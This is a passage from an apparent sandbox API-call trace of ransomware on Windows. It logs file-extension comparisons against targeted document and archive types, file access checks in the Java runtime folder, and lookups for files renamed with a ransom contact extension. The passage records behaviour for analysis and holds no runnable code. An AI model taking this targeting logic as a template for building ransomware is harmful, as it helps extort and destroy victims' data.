returned 4 [0157.445] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0157.446] lstrlenW (lpString=".docx") returned 5 [0157.446] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0157.446] lstrlenW (lpString=".pdf") returned 4 [0157.446] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0157.446] lstrlenW (lpString=".xls") returned 4 [0157.446] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0157.446] lstrlenW (lpString=".xlsx") returned 5 [0157.446] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0157.446] lstrlenW (lpString=".ppt") returned 4 [0157.446] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0157.446] lstrlenW (lpString="C:\\Boot\\bootspaces.dll") returned 22 [0157.446] lstrlenW (lpString=".zip") returned 4 [0157.446] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0157.446] lstrlenW (lpString=".rar") returned 4 [0157.446] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0157.446] lstrlenW (lpString=".bz2") returned 4 [0157.446] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0157.446] lstrlenW (lpString=".7z") returned 3 [0157.446] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0157.446] lstrlenW (lpString="C:\\Boot\\bootspaces.dll") returned 22 [0157.446] lstrlenW (lpString=".dbf") returned 4 [0157.446] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0157.446] lstrlenW (lpString="C:\\Boot\\bootspaces.dll") returned 22 [0157.446] lstrlenW (lpString=".1cd") returned 4 [0157.446] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0157.446] lstrlenW (lpString="C:\\Boot\\bootspaces.dll") returned 22 [0157.446] lstrlenW (lpString=".jpg") returned 4 [0157.446] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0157.447] lstrlenW (lpString="C:\\Boot\\bootspaces.dll") returned 22 [0157.447] lstrlenW (lpString="C:\\Boot\\bootspaces.dll") returned 22 [0157.447] lstrlenW (lpString=".doc") returned 4 [0157.447] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0157.447] lstrlenW (lpString=".docx") returned 5 [0157.447] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0157.447] lstrlenW (lpString=".pdf") returned 4 [0157.447] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0157.447] lstrlenW (lpString=".xls") returned 4 [0157.447] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0157.447] lstrlenW (lpString=".xlsx") returned 5 [0157.447] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0157.447] lstrlenW (lpString=".ppt") returned 4 [0157.447] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0157.447] lstrlenW (lpString="C:\\Boot\\bootspaces.dll") returned 22 [0157.447] lstrlenW (lpString=".zip") returned 4 [0157.447] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0157.447] lstrlenW (lpString=".rar") returned 4 [0157.447] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0157.447] lstrlenW (lpString=".bz2") returned 4 [0157.447] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0157.447] lstrlenW (lpString=".7z") returned 3 [0157.447] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0157.447] lstrlenW (lpString="C:\\Boot\\bootspaces.dll") returned 22 [0157.447] lstrlenW (lpString=".dbf") returned 4 [0157.447] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0157.448] lstrlenW (lpString="C:\\Boot\\bootspaces.dll") returned 22 [0157.448] lstrlenW (lpString=".1cd") returned 4 [0157.448] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0157.448] lstrlenW (lpString="C:\\Boot\\bootspaces.dll") returned 22 [0157.448] lstrlenW (lpString=".jpg") returned 4 [0157.448] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0157.448] Sleep (dwMilliseconds=0x64) [0157.862] Sleep (dwMilliseconds=0x64) [0158.257] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0158.257] lstrlenW (lpString="j2pkcs11.dll") returned 12 [0158.257] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\j2pkcs11.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\j2pkcs11.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x414 [0158.259] GetFileSizeEx (in: hFile=0x414, lpFileSize=0x33bff14 | out: lpFileSize=0x33bff14*=63552) returned 1 [0158.259] CloseHandle (hObject=0x414) returned 1 [0158.259] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\j2pkcs11.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\j2pkcs11.dll")) returned 0x20 [0158.259] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\j2pkcs11.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\j2pkcs11.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0158.259] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\j2pkcs11.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\j2pkcs11.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0158.259] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\j2pkcs11.dll") returned 51 [0158.259] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\j2pkcs11.dll") returned 51 [0158.259] lstrlenW (lpString=".doc") returned 4 [0158.259] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0158.259] lstrlenW (lpString=".docx") returned 5 [0158.259] lstrcmpiW (lpString1=".docx", lpString2="1.dll") returned -1 [0158.259] lstrlenW (lpString=".pdf") returned 4 [0158.259] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0158.259] lstrlenW (lpString=".xls") returned 4 [0158.259] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0158.259] lstrlenW (lpString=".xlsx") returned 5 [0158.259] lstrcmpiW (lpString1=".xlsx", lpString2="1.dll") returned -1 [0158.259] lstrlenW (lpString=".ppt") returned 4 [0158.260] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0158.260] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\j2pkcs11.dll") returned 51 [0158.260] lstrlenW (lpString=".zip") returned 4 [0158.260] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0158.260] lstrlenW (lpString=".rar") returned 4 [0158.260] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0158.260] lstrlenW (lpString=".bz2") returned 4 [0158.260] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0158.260] lstrlenW (lpString=".7z") returned 3 [0158.260] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0158.260] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\j2pkcs11.dll") returned 51 [0158.260] lstrlenW (lpString=".dbf") returned 4 [0158.260] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0158.260] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\j2pkcs11.dll") returned 51 [0158.260] lstrlenW (lpString=".1cd") returned 4 [0158.260] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0158.260] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\j2pkcs11.dll") returned 51 [0158.260] lstrlenW (lpString=".jpg") returned 4 [0158.260] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0158.260] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\j2pkcs11.dll") returned 51 [0158.260] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\j2pkcs11.dll") returned 51 [0158.260] lstrlenW (lpString=".doc") returned 4 [0158.260] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0158.260] lstrlenW (lpString=".docx") returned 5 [0158.260] lstrcmpiW (lpString1=".docx", lpString2="1.dll") returned -1 [0158.260] lstrlenW (lpString=".pdf") returned 4 [0158.260] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0158.261] lstrlenW (lpString=".xls") returned 4 [0158.261] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0158.261] lstrlenW (lpString=".xlsx") returned 5 [0158.261] lstrcmpiW (lpString1=".xlsx", lpString2="1.dll") returned -1 [0158.261] lstrlenW (lpString=".ppt") returned 4 [0158.261] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0158.261] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\j2pkcs11.dll") returned 51 [0158.261] lstrlenW (lpString=".zip") returned 4 [0158.261] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0158.261] lstrlenW (lpString=".rar") returned 4 [0158.261] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0158.261] lstrlenW (lpString=".bz2") returned 4 [0158.261] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0158.261] lstrlenW (lpString=".7z") returned 3 [0158.261] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0158.261] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\j2pkcs11.dll") returned 51 [0158.261] lstrlenW (lpString=".dbf") returned 4 [0158.261] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0158.261] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\j2pkcs11.dll") returned 51 [0158.261] lstrlenW (lpString=".1cd") returned 4 [0158.261] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0158.261] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\j2pkcs11.dll") returned 51 [0158.261] lstrlenW (lpString=".jpg") returned 4 [0158.261] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0158.262] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0158.262] lstrlenW (lpString="jaas_nt.dll") returned 11 [0158.262] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jaas_nt.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jaas_nt.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x414 [0158.262] GetFileSizeEx (in: hFile=0x414, lpFileSize=0x33bff14 | out: lpFileSize=0x33bff14*=21056) returned 1 [0158.262] CloseHandle (hObject=0x414) returned 1 [0158.262] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jaas_nt.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jaas_nt.dll")) returned 0x20 [0158.262] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jaas_nt.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jaas_nt.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0158.263] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jaas_nt.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jaas_nt.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0158.263] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jaas_nt.dll") returned 50 [0158.263] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jaas_nt.dll") returned 50 [0158.263] lstrlenW (lpString=".doc") returned 4 [0158.263] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0158.263] lstrlenW (lpString=".docx") returned 5 [0158.263] lstrcmpiW (lpString1=".docx", lpString2="t.dll") returned -1 [0158.263] lstrlenW (lpString=".pdf") returned 4 [0158.263] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0158.263] lstrlenW (lpString=".xls") returned 4 [0158.263] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0158.263] lstrlenW (lpString=".xlsx") returned 5 [0158.263] lstrcmpiW (lpString1=".xlsx", lpString2="t.dll") returned -1 [0158.263] lstrlenW (lpString=".ppt") returned 4 [0158.263] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0158.263] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jaas_nt.dll") returned 50 [0158.263] lstrlenW (lpString=".zip") returned 4 [0158.263] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0158.263] lstrlenW (lpString=".rar") returned 4 [0158.263] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0158.263] lstrlenW (lpString=".bz2") returned 4 [0158.263] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0158.263] lstrlenW (lpString=".7z") returned 3 [0158.263] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0158.263] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jaas_nt.dll") returned 50 [0158.263] lstrlenW (lpString=".dbf") returned 4 [0158.263] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0158.263] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jaas_nt.dll") returned 50 [0158.264] lstrlenW (lpString=".1cd") returned 4 [0158.264] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0158.264] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jaas_nt.dll") returned 50 [0158.264] lstrlenW (lpString=".jpg") returned 4 [0158.264] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0158.264] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jaas_nt.dll") returned 50 [0158.264] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jaas_nt.dll") returned 50 [0158.264] lstrlenW (lpString=".doc") returned 4 [0158.264] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0158.264] lstrlenW (lpString=".docx") returned 5 [0158.264] lstrcmpiW (lpString1=".docx", lpString2="t.dll") returned -1 [0158.264] lstrlenW (lpString=".pdf") returned 4 [0158.264] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0158.264] lstrlenW (lpString=".xls") returned 4 [0158.264] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0158.264] lstrlenW (lpString=".xlsx") returned 5 [0158.264] lstrcmpiW (lpString1=".xlsx", lpString2="t.dll") returned -1 [0158.264] lstrlenW (lpString=".ppt") returned 4 [0158.264] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0158.264] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jaas_nt.dll") returned 50 [0158.264] lstrlenW (lpString=".zip") returned 4 [0158.264] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0158.264] lstrlenW (lpString=".rar") returned 4 [0158.264] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0158.264] lstrlenW (lpString=".bz2") returned 4 [0158.264] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0158.264] lstrlenW (lpString=".7z") returned 3 [0158.264] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0158.264] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jaas_nt.dll") returned 50 [0158.264] lstrlenW (lpString=".dbf") returned 4 [0158.264] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0158.265] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jaas_nt.dll") returned 50 [0158.265] lstrlenW (lpString=".1cd") returned 4 [0158.265] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0158.265] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jaas_nt.dll") returned 50 [0158.265] lstrlenW (lpString=".jpg") returned 4 [0158.265] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0158.265] lstrcmpiW (lpString1=".exe", lpString2=".bat") returned 1 [0158.265] lstrlenW (lpString="jabswitch.exe") returned 13 [0158.265] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jabswitch.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jabswitch.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x414 [0158.265] GetFileSizeEx (in: hFile=0x414, lpFileSize=0x33bff14 | out: lpFileSize=0x33bff14*=34368) returned 1 [0158.265] CloseHandle (hObject=0x414) returned 1 [0158.266] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jabswitch.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jabswitch.exe")) returned 0x20 [0158.266] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jabswitch.exe.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jabswitch.exe.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0158.266] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jabswitch.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jabswitch.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0158.266] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jabswitch.exe") returned 52 [0158.266] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jabswitch.exe") returned 52 [0158.266] lstrlenW (lpString=".doc") returned 4 [0158.266] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0158.266] lstrlenW (lpString=".docx") returned 5 [0158.266] lstrcmpiW (lpString1=".docx", lpString2="h.exe") returned -1 [0158.266] lstrlenW (lpString=".pdf") returned 4 [0158.266] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0158.266] lstrlenW (lpString=".xls") returned 4 [0158.266] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0158.266] lstrlenW (lpString=".xlsx") returned 5 [0158.266] lstrcmpiW (lpString1=".xlsx", lpString2="h.exe") returned -1 [0158.266] lstrlenW (lpString=".ppt") returned 4 [0158.266] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0158.266] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jabswitch.exe") returned 52 [0158.266] lstrlenW (lpString=".zip") returned 4 [0158.266] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0158.266] lstrlenW (lpString=".rar") returned 4 [0158.266] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0158.266] lstrlenW (lpString=".bz2") returned 4 [0158.266] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0158.267] lstrlenW (lpString=".7z") returned 3 [0158.267] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0158.267] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jabswitch.exe") returned 52 [0158.267] lstrlenW (lpString=".dbf") returned 4 [0158.267] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0158.267] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jabswitch.exe") returned 52 [0158.267] lstrlenW (lpString=".1cd") returned 4 [0158.267] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0158.267] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jabswitch.exe") returned 52 [0158.267] lstrlenW (lpString=".jpg") returned 4 [0158.267] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0158.267] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jabswitch.exe") returned 52 [0158.267] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jabswitch.exe") returned 52 [0158.267] lstrlenW (lpString=".doc") returned 4 [0158.267] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0158.267] lstrlenW (lpString=".docx") returned 5 [0158.267] lstrcmpiW (lpString1=".docx", lpString2="h.exe") returned -1 [0158.267] lstrlenW (lpString=".pdf") returned 4 [0158.267] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0158.267] lstrlenW (lpString=".xls") returned 4 [0158.267] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0158.267] lstrlenW (lpString=".xlsx") returned 5 [0158.267] lstrcmpiW (lpString1=".xlsx", lpString2="h.exe") returned -1 [0158.267] lstrlenW (lpString=".ppt") returned 4 [0158.267] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0158.267] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jabswitch.exe") returned 52 [0158.267] lstrlenW (lpString=".zip") returned 4 [0158.267] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0158.267] lstrlenW (lpString=".rar") returned 4 [0158.268] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0158.268] lstrlenW (lpString=".bz2") returned 4 [0158.268] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0158.268] lstrlenW (lpString=".7z") returned 3 [0158.268] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0158.268] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jabswitch.exe") returned 52 [0158.268] lstrlenW (lpString=".dbf") returned 4 [0158.268] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0158.268] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jabswitch.exe") returned 52 [0158.268] lstrlenW (lpString=".1cd") returned 4 [0158.268] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0158.268] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jabswitch.exe") returned 52 [0158.268] lstrlenW (lpString=".jpg") returned 4 [0158.268] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0158.268] lstrcmpiW (lpString1=".exe", lpString2=".bat") returned 1 [0158.268] lstrlenW (lpString="java-rmi.exe") returned 12 [0158.268] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\java-rmi.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\java-rmi.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x414 [0158.269] GetFileSizeEx (in: hFile=0x414, lpFileSize=0x33bff14 | out: lpFileSize=0x33bff14*=15936) returned 1 [0158.269] CloseHandle (hObject=0x414) returned 1 [0158.269] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\java-rmi.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\java-rmi.exe")) returned 0x20 [0158.269] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\java-rmi.exe.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\java-rmi.exe.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0158.270] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\java-rmi.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\java-rmi.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0158.270] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\java-rmi.exe") returned 51 [0158.270] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\java-rmi.exe") returned 51 [0158.270] lstrlenW (lpString=".doc") returned 4 [0158.270] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0158.270] lstrlenW (lpString=".docx") returned 5 [0158.270] lstrcmpiW (lpString1=".docx", lpString2="i.exe") returned -1 [0158.270] lstrlenW (lpString=".pdf") returned 4 [0158.270] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0158.270] lstrlenW (lpString=".xls") returned 4 [0158.270] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0158.270] lstrlenW (lpString=".xlsx") returned 5 [0158.270] lstrcmpiW (lpString1=".xlsx", lpString2="i.exe") returned -1 [0158.270] lstrlenW (lpString=".ppt") returned 4 [0158.270] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0158.270] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\java-rmi.exe") returned 51 [0158.270] lstrlenW (lpString=".zip") returned 4 [0158.270] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0158.270] lstrlenW (lpString=".rar") returned 4 [0158.270] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0158.270] lstrlenW (lpString=".bz2") returned 4 [0158.270] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0158.270] lstrlenW (lpString=".7z") returned 3 [0158.270] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0158.270] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\java-rmi.exe") returned 51 [0158.270] lstrlenW (lpString=".dbf") returned 4 [0158.271] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0158.271] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\java-rmi.exe") returned 51 [0158.271] lstrlenW (lpString=".1cd") returned 4 [0158.271] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0158.271] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\java-rmi.exe") returned 51 [0158.271] lstrlenW (lpString=".jpg") returned 4 [0158.271] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0158.271] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\java-rmi.exe") returned 51 [0158.271] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\java-rmi.exe") returned 51 [0158.271] lstrlenW (lpString=".doc") returned 4 [0158.271] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0158.271] lstrlenW (lpString=".docx") returned 5 [0158.271] lstrcmpiW (lpString1=".docx", lpString2="i.exe") returned -1 [0158.271] lstrlenW (lpString=".pdf") returned 4 [0158.271] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0158.271] lstrlenW (lpString=".xls") returned 4 [0158.271] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0158.271] lstrlenW (lpString=".xlsx") returned 5 [0158.271] lstrcmpiW (lpString1=".xlsx", lpString2="i.exe") returned -1 [0158.271] lstrlenW (lpString=".ppt") returned 4 [0158.271] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0158.271] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\java-rmi.exe") returned 51 [0158.271] lstrlenW (lpString=".zip") returned 4 [0158.271] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0158.271] lstrlenW (lpString=".rar") returned 4 [0158.271] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0158.271] lstrlenW (lpString=".bz2") returned 4 [0158.272] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0158.272] lstrlenW (lpString=".7z") returned 3 [0158.272] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0158.272] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\java-rmi.exe") returned 51 [0158.272] lstrlenW (lpString=".dbf") returned 4 [0158.272] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0158.272] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\java-rmi.exe") returned 51 [0158.272] lstrlenW (lpString=".1cd") returned 4 [0158.272] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 